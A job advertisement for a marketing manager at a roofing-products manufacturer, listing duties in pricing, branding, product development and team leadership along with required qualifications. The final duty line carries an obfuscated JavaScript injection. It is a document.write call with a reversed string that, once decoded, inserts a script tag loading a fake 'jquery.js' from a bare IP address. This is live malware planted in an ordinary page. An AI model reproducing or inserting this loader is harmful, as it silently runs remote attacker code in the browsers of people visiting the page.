Industry : Manufacturing
Report To : National Sales & Marketing Manager
• To contribute and help secure the business unit’s strategic objectives.
• To formulate within LR guidelines, Company marketing plans which meet company objectives of growth, market share and EVA. Secure agreements to these plans.
• To prepare and keep up to date a market segmentation analysis and model. Identify growth opportunities and competitive threats.
• To develop, get agreement for and implement appropriate product positioning and brand strategies. Do this within agreed timescales and budgets. The products covered includes tiles, fitting, RSC, services, solutions and other roofing products in the company.
• To develop and recommend pricing policies and discount structures which enable the achievement of company profit targets.
• To lead new products and service development activity, for Roof covering and Roof system components identifying opportunities, preparing a commercial justification and getting agreement, forming an appropriate project team, planning and implementing the launch.
• To oversee all internal and external marketing communication and promotional activities relating to the company image, products or services and ensuring correct use of the brand and corporate identities.
• Organize the timely provision of market data and plans to the sales personnel to assist them to set and meet their sales targets within the marketing framework.
• Develop and maintain a marketing department structure staffed with people who know what is expected of them and are capable of meeting departmental and individual objectives.
• Oversee the development of appropriate promotion and advertising materials.
• As a member of the Executive Committee contributes towards training and development of employees.
• Assist the Commercial Director in the development and operation of marketing function outside the BU.
• Minimum Degree in Business Administration and with experience in marketing & product specification environment
• A sound tertiary qualification with more than 8 years managerial experience, 3 of them at senior management level.
• Having experience doing specification related works within the building materials industry (preferably)
• Having experience managing a team of specifiers / specification executives to target housing developers, architects, quantity surveyors within the specification roles & responsibilities
• Strong numeric and analytical skills. Ability to work with technical as well as artistic concepts.
• Good interpersonal and written communication skills
• Vision leadership and drive document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))
To apply for this job email your details to firstname.lastname@example.org